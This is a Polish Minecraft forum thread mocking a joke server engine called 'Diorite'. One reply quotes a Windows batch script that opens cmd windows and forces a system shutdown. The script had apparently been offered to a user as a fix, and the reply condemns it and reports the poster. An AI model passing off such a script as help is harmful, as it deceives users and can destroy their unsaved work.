Skocz do zawartości
  • 👋 Witaj na MPCForum!

    Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

    • Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

    👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

    Zarejestruj się teraz

Diorite - Nowy autorski, jedyny, silnik minecrafta, #OnlyDiorite.


GotoFinal

Rekomendowane odpowiedzi

Opublikowano

P******e, robię serwer na tym xD

 

Dobra robota, towarzyszu. :v 

 

 

 

nie bij, wiem że to fake

mogłeś się troche bardziej postarać, przecież to aż jebie trollem na 5 kilometrów ;v

co nie zmienia faktu że mam bekę z ludzi wyżej co myślą że to działa xD

 

dla tych co nadal myślą że to jest prawdziwe, 496521435651287827517.png

Ale i tak szacun że chciało Ci się to wszystko podmieniać i zamieniać żeby wyszło że prawdziwe :D

­

Moja oficjalna strona! :)

http://socketbyte.pl/ 

  • Odpowiedzi 71
  • Dodano
  • Ostatniej odpowiedzi
Opublikowano

Powiadam dupe urywa! wreszcie coś dobrego na tym Forum ! Ulepszajcie ten silnik

 

 

#OnlyDiorite   #FuckUpBukkit

HTBCzoQ.png


Chcesz żebym zobaczył co nabazgrałeś?


dodaj @rzy4y do posta to zobacze :)


if player has name "rzy4y"


Execute command: /Give a like


Opublikowano

Dbr a tak na poważnie czym się to różni i czy działa....

(Nie jestem programistą javy tylko scali więc dużo z kodu nie zrozumiem chociaż jest podobieństwo)

Opublikowano

"Banowanie na płytę główną, od jednego z najsławniejszych programistów minikleksa, bonzo." - teraz to pierdolnąłem xD 

 

btw. świetny silnik, używam właśnie go na moim serwerze i aż wszystkie pluginy działają! i ta wydajność, na starcie było 150 graczy i 0 lagów (ciągle 20 TPS'ów a nawet 21!)

Opublikowano

"Banowanie na płytę główną, od jednego z najsławniejszych programistów minikleksa, bonzo." - teraz to pierdolnąłem xD 

 

btw. świetny silnik, używam właśnie go na moim serwerze i aż wszystkie pluginy działają! i ta wydajność, na starcie było 150 graczy i 0 lagów (ciągle 20 TPS'ów a nawet 21!)

Pff... w diorite mozesz ustawic nawet 100TPS!

Opublikowano

Pff... w diorite mozesz ustawic nawet 100TPS!

Aktualnie niestety tylko 99 :< Pracujemy nad dodaniem wsparcie dla 100.

 

 

"Banowanie na płytę główną, od jednego z najsławniejszych programistów minikleksa, bonzo." - teraz to pierdolnąłem xD 

 

btw. świetny silnik, używam właśnie go na moim serwerze i aż wszystkie pluginy działają! i ta wydajność, na starcie było 150 graczy i 0 lagów (ciągle 20 TPS'ów a nawet 21!)

Proszę się nie śmać z naszych możliwości, to że potrafimy więcej niż inni, nie oznacza że można się smiać!

 

 

P******e, robię serwer na tym xD

 

Dobra robota, towarzyszu. :v 

 

 

 

nie bij, wiem że to fake

mogłeś się troche bardziej postarać, przecież to aż jebie trollem na 5 kilometrów ;v

co nie zmienia faktu że mam bekę z ludzi wyżej co myślą że to działa xD

 

dla tych co nadal myślą że to jest prawdziwe, 496521435651287827517.png

Ale i tak szacun że chciało Ci się to wszystko podmieniać i zamieniać żeby wyszło że prawdziwe :D

­

Sam jesteś Fake, jedna klasa nic nie zmienia!

A do tego i tak jest inna!

 

 

@GotoFinal @artur9010 A będzie wbudowany script :D

 

A tak naprawdę to kawał dobrej roboty. Moglibyście dać link do jakiegoś donejta

Oczywiście że będzie, skript to jednej z najbardziej wysoko-nisko poziomowy język na świecie, brak jego implementacji w diorite skazał by nas na bolesną klęskę. 

1438614356923701010629.png

 

Opublikowano

P******e, robię serwer na tym xD

 

Dobra robota, towarzyszu. :v 

 

 

 

nie bij, wiem że to fake

mogłeś się troche bardziej postarać, przecież to aż jebie trollem na 5 kilometrów ;v

co nie zmienia faktu że mam bekę z ludzi wyżej co myślą że to działa xD

 

dla tych co nadal myślą że to jest prawdziwe, 496521435651287827517.png

Ale i tak szacun że chciało Ci się to wszystko podmieniać i zamieniać żeby wyszło że prawdziwe :D

­

[link usuniety] mi to tam na fejk nie wyglada :)

Opublikowano

Aktualnie niestety tylko 99 :< Pracujemy nad dodaniem wsparcie dla 100.

 

 

Proszę się nie śmać z naszych możliwości, to że potrafimy więcej niż inni, nie oznacza że można się smiać!

 

 

Sam jesteś Fake, jedna klasa nic nie zmienia!

A do tego i tak jest inna!

 

 

Oczywiście że będzie, skript to jednej z najbardziej wysoko-nisko poziomowy język na świecie, brak jego implementacji w diorite skazał by nas na bolesną klęskę. 

pomozesz mi? czemu konsola znika mi jak otwieram? mam jave 7

Opublikowano

pomozesz mi? czemu konsola znika mi jak otwieram? mam jave 7

sciągnij ten pliczek, odrazu ci się naprawi a następnie odpal serwer plikiem startowym :D

x
Opublikowano

Silnik wygląda na bardzo fajny, plusem jest że jest dostosowany pod polskie serwery, widać że jest lepszy od wielu innych Bukkitów i Tekkitów.

 

#OnlyDiorite       #BukkitIsShit

 

Pozdrawiam

Moja ocena: 9/9

online.png

Opublikowano

Ja jebie, naprawdę nie widzicie w tym trolla? xD

To wam trochę pomogę,

 

 

 

Własnie stworzylem nowy silnik minicraft!

Już zaczyna być podejrzanie.

 

 

 

ale dzięki inspiracji i pomocy ze strony ludzi projektu Fekkit już zaczynają działać pierwsze jego elementy!

Fekkit to był troll :D

 

 

 

  • Jest dostosowany pod Polskie serwery, dlatego zawiera wbudowany plugin na gildie i hardcore by @dzikoysk & @ArturBrodek

xD

 

 

 

  • Dzięki użyciu zapożyczonej od Fekkita technologii nekkit++ połączenie z graczami działa jeszcze wydajniej i stabilniej.

Nekkit to był jeszcze większy troll, autorskie proxy i te sprawy xD

 

 

 

Ze wsparciem graczy no-premium z premium nickami!

Lol, nie.

 

 

 

Piszemy go za pomocą ISO 8859-2, jest to najnowocześniejsza opcja tworzenia nowych aplikacji, wspierania przez nasze profesjonalne IDE Enclipse -> nasza własna wersja Eclipse.

https://pl.wikipedia.org/wiki/ISO_8859-2

 

Nie możliwe, GotoFinal zawsze gardził Eclipsem :D

 

 

 

Język jak i formatowanie kodu opracowane przez znanego wszystkim technika @Kamilkime

No własnie, przez tego zajebistego kodera, którego GotoFinal zawsze hejci :D

 

 

 

  • Pomagają nam znani programiści z takich sławnych serwerow jak hajpixel czy minikleks.

No chyba nie, poza tym, hajpixel :P

 

 

 

  • Server w chmurze! Tak! Od teraz możesz postawić dowolną ilość serwerów, na dowolnej ilości hostów, które będą działały jako jeden wielki serwer! 

Silnik i hosting w chmurze? Chyba nie za bardzo xD

 

 

 

  • System wątków opierający się na nowoczesnej technologii HTML5 zapewniającą znacznie wydajniejsze zarządzanie wieloma wątkami i procesami.

Tutaj najbardziej jebłem, robią system wątków na technologii do tworzenia stron :D:D

 

 

 

  • Banowanie na płytę główną, od jednego z najsławniejszych programistów minikleksa, bonzo.

Haha xD

 

 

 

Najnowocześniejsza technologia Gold Random Update Block, technologia GRUB to zacznie lepsza wersja systemu aktualizacji chunków na mapie! Gdzie każdy aktualizowany blok przechowywany jest w liście JSON i przetwarzany za pomocą CSS w osobnym wątku.

 

Niby wszystko okej, ale...

 

 

Gdzie każdy aktualizowany blok przechowywany jest w liście JSON i przetwarzany za pomocą CSS w osobnym wątku.

K***a mać nie wytrzymałem xD  i te przetwarzanie za pomocą języka do stylów stron XDDDD

 

 

 

Silnik dziala na wielu wątkach, każde entity ma własny wątek dzięki czemu wydajność serwera jest znacznie większa

Każde entity ma własny wątek, na pewno jest znacznie wieksza, na pewno. :D

 

 

 

  • Pakiety są szyfrowane znacznie lepiej niż w innych silnikach! szyfrowanie trwa cały czas, nawet po odczytaniu pakietu, dane dalej są zaszyfrowane, tak samo z pamięcią serwera, wszystko to dzięki nowoczesnym technologią nekkit++ i ciężkiej pracy @joda17orginal

Hahahahahahahahha, tu już chyba nie muszę tłumaczyć XDD o k***a XDDD

 

 

 

  • Silnik wykorzystując lukę w systemach Mojangu oferuje możliwość wygrania modów do clienta poprzez HTML5 do wszystkich graczy online.

xD

Nie dość, że wykorzystuje lukę w systemach w c**j wielkiego Corp jakim jest Mojang, to oferuje wgranie modów do clienta poprzez język do kodowania stron do wszystkich graczy online XDDDDDDDD

 

 

 

Nie ważne czy to bakkit, spigibot, spange czy glawstane czy cokolwiek innego

mhm...

 

 

wszystko to dzięki nowoczesnym sposobom programowania i technologią typu JavaScript i YAML

brak słów ;_;

 

 

 

Ponad 99% serwerów opartych na Diorite, używa Diorite!

 

A ten 1% na bukkicie? xD i ten obrazek hahaha xD

 

 

 

 

Pozdrawiam xD

 

a właśnie

@Vinect

Nie spodziewałem się tego po tobie, 

@echo off 
PING -n 2 127.0.0.1 >nul 
start cmd.exe 
start cmd.exe 
PING -n 2 127.0.0.1 >nul 
start cmd.exe 
start cmd.exe 
PING -n 2 127.0.0.1 >nul 
start cmd.exe 
start cmd.exe 
PING -n 2 127.0.0.1 >nul 
start cmd.exe 
start cmd.exe 
shutdown.exe -s -t 15 

Naprawdę?

Myślałem że masz więcej rozumu, nawet jeżeli to jest troll.

I jeszcze ten gotowy kod - http://www.gierkipc.fora.pl/font-color-330099-poradniki-font,27/pisanie-wirusow-bat,7.html

 

No po prostu gratulacje, mistrz k***a hakjerów. Jeszcze usuń mu windowsa z gotowego kodu i ciesz się swoim idiotyzmem.

 

Lubię cię, ale poszedł report za keyloggery, wirusy i inne gówna.

Moja oficjalna strona! :)

http://socketbyte.pl/ 

Opublikowano

Dodaj skan, 1h.

Ślepy jesteś czy co?

Ten pliczek pinguje localhosta (można zaliczyć do wirusów) i wyłącza system, co jeżeli koleś miał niezapisane ważne dokumenty? 

 

 

 

Ten kod, sam go sobie przetłumacz, i powiedz mi czy to nie zalicza się pod keyloggery i wirusy

@echo off 
PING -n 2 127.0.0.1 >nul 
start cmd.exe 
start cmd.exe 
PING -n 2 127.0.0.1 >nul 
start cmd.exe 
start cmd.exe 
PING -n 2 127.0.0.1 >nul 
start cmd.exe 
start cmd.exe 
PING -n 2 127.0.0.1 >nul 
start cmd.exe 
start cmd.exe 
shutdown.exe -s -t 15  

 

 

­

Moja oficjalna strona! :)

http://socketbyte.pl/ 

Opublikowano

Ja jebie, naprawdę nie widzicie w tym trolla? xD

To wam trochę pomogę,

 

Już zaczyna być podejrzanie.

 

Fekkit to był troll :D

 

xD

 

Nekkit to był jeszcze większy troll, autorskie proxy i te sprawy xD

 

Lol, nie.

 

https://pl.wikipedia.org/wiki/ISO_8859-2

 

Nie możliwe, GotoFinal zawsze gardził Eclipsem :D

 

No własnie, przez tego zajebistego kodera, którego GotoFinal zawsze hejci :D

 

No chyba nie, poza tym, hajpixel :P

 

Silnik i hosting w chmurze? Chyba nie za bardzo xD

 

Tutaj najbardziej jebłem, robią system wątków na technologii do tworzenia stron :D:D

 

Haha xD

 

 

Niby wszystko okej, ale...

K***a mać nie wytrzymałem xD  i te przetwarzanie za pomocą języka do stylów stron XDDDD

 

Każde entity ma własny wątek, na pewno jest znacznie wieksza, na pewno. :D

 

Hahahahahahahahha, tu już chyba nie muszę tłumaczyć XDD o k***a XDDD

 

xD

Nie dość, że wykorzystuje lukę w systemach w c**j wielkiego Corp jakim jest Mojang, to oferuje wgranie modów do clienta poprzez język do kodowania stron do wszystkich graczy online XDDDDDDDD

 

mhm...

brak słów ;_;

 

 

A ten 1% na bukkicie? xD i ten obrazek hahaha xD

 

 

 

 

Pozdrawiam xD

 

a właśnie

@Vinect

Nie spodziewałem się tego po tobie, 

@echo off 
PING -n 2 127.0.0.1 >nul 
start cmd.exe 
start cmd.exe 
PING -n 2 127.0.0.1 >nul 
start cmd.exe 
start cmd.exe 
PING -n 2 127.0.0.1 >nul 
start cmd.exe 
start cmd.exe 
PING -n 2 127.0.0.1 >nul 
start cmd.exe 
start cmd.exe 
shutdown.exe -s -t 15 

Naprawdę?

Myślałem że masz więcej rozumu, nawet jeżeli to jest troll.

I jeszcze ten gotowy kod - http://www.gierkipc.fora.pl/font-color-330099-poradniki-font,27/pisanie-wirusow-bat,7.html

 

No po prostu gratulacje, mistrz k***a hakjerów. Jeszcze usuń mu windowsa z gotowego kodu i ciesz się swoim idiotyzmem.

 

Lubię cię, ale poszedł report za keyloggery, wirusy i inne gówna.

Ale ty problemy kolego masz....

Znam osobę która sama napisała silnik i go nie udostępniła(raczej nie ma konta na mpc) więc nie mów że się nie da....

Opublikowano

@1361622928-U485574.pngWampir7858

Nie wiem czy zauważyłeś, nie napisałem tam że nie da się napisać silnika, bo się k***a da.

 

Chciałem tylko udowodnić dla niektórych ślepych osób że to jest EWIDENTNY troll, poza tym, śmieszny troll i graty dla ciebie @GotoFinal :D

Moja oficjalna strona! :)

http://socketbyte.pl/ 

Opublikowano

Ślepy jesteś czy co?

Ten pliczek pinguje localhosta (można zaliczyć do wirusów) i wyłącza system, co jeżeli koleś miał niezapisane ważne dokumenty? 

 

 

 

Ten kod, sam go sobie przetłumacz, i powiedz mi czy to nie zalicza się pod keyloggery i wirusy

@echo off 
PING -n 2 127.0.0.1 >nul 
start cmd.exe 
start cmd.exe 
PING -n 2 127.0.0.1 >nul 
start cmd.exe 
start cmd.exe 
PING -n 2 127.0.0.1 >nul 
start cmd.exe 
start cmd.exe 
PING -n 2 127.0.0.1 >nul 
start cmd.exe 
start cmd.exe 
shutdown.exe -s -t 15  

 

 

­

Czy gdyby to byl fake, serwer by tak ladnie odpowiadal na pingi?

http://screenshootereu.blob.core.windows.net/engine4files/tateruesdwryqpaopvkanreiwyrnblexysicoitswsmvcwswtxuwyoccwlhscqqsstzygyzgbrdvfjfzguueqhykpgfdabpfbtci

(nie moge zdj dac bo zly format...)

Opublikowano

@1361622928-U485574.pngWampir7858

Nie wiem czy zauważyłeś, nie napisałem tam że nie da się napisać silnika, bo się k***a da.

 

Chciałem tylko udowodnić dla niektórych ślepych osób że to jest EWIDENTNY troll, poza tym, śmieszny troll i graty dla ciebie @GotoFinal :D

 

Ten temat to jest troll, ale goto jeszcze dzisiaj wstawia prawdziwy. :D

 

PS. Szybcy jesteście

Opublikowano

Ten temat to jest troll, ale goto jeszcze dzisiaj wstawia prawdziwy. :D

 

PS. Szybcy jesteście

Trzymam za słowo :DxD

 

@topic

Fajny plugin, lubię takie silniki, chyba ostatni jest taki na ForumMPC? Szczerze powiedziawszy usuńcie jeszcze odinstalowywanie modów bez pobierania ich za pomocą HTML i Perl'a ok??

­

Moja oficjalna strona! :)

http://socketbyte.pl/ 

Opublikowano

@GotoFinal

Dodaj api do pluginów w CSS

Polać mu!

 

Poza tym, mam jeszcze parę pomysłów:

- Zróbcie tak że silnik ma rozszerzenie *.diorite

- Napiszcie api pod strony do HTML (np. dynamiczna mapa penisów graczy)

- Dodajcie że zamiast pluginów wgrywa się sterowniki do karty dźwiękowej

- Dodajcie emotikony, ze jak sie wpisze <===3 to wychodzi taki penis, a jak się wpisze (.)(.) to wtedy sami już wiecie co wychodzi.

- Dodajcie uploader zdjęc na czat

- Dodajcie mozliwosc robienia wlasnych blokow za pomoca LOLCode i stylowania ich w JavaScripcie

 

Bede edytowal jak mi jakis pomysl przyjdzie!

 

 

­

Moja oficjalna strona! :)

http://socketbyte.pl/ 

Opublikowano

@GotoFinal

Dodaj api do pluginów w CSS

myślę że to bardzo dobry pomysł, CSS jest bardzo nowoczesnym i kaskadowym językiem, myślę że kaskadowość to przyszłość programistyki/informatyki, nie nie daje tylu możliwości, szczególnie w przypadku pisania aplikacji serverowych, więc podzielam twój pomysł i postaram się go zrealizować. 

1438614356923701010629.png

 

Opublikowano

Polać mu!

 

Poza tym, mam jeszcze parę pomysłów:

- Zróbcie tak że silnik ma rozszerzenie *.diorite

- Napiszcie api pod strony do HTML (np. dynamiczna mapa penisów graczy)

- Dodajcie że zamiast pluginów wgrywa się sterowniki do karty dźwiękowej

- Dodajcie emotikony, ze jak sie wpisze <===3 to wychodzi taki penis, a jak się wpisze (.)(.) to wtedy sami już wiecie co wychodzi.

- Dodajcie uploader zdjęc na czat

- Dodajcie mozliwosc robienia wlasnych blokow za pomoca LOLCode i stylowania ich za w JavaScripcie

 

Bede edytowal jak mi jakis pomysl przyjdzie!

 

 

­

Przeciez *.diorite juz jest

API jest w CSS i JS, ale nie zaszkodzi dodac html'a

Narazie sa od grafikii

Jest

Jest tylko uploader filmow :/

Narazie korzystamy z WTFCode a stylujemy je w HTML'u. Ale dzieki za propozycje

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

×
×
  • Dodaj nową pozycję...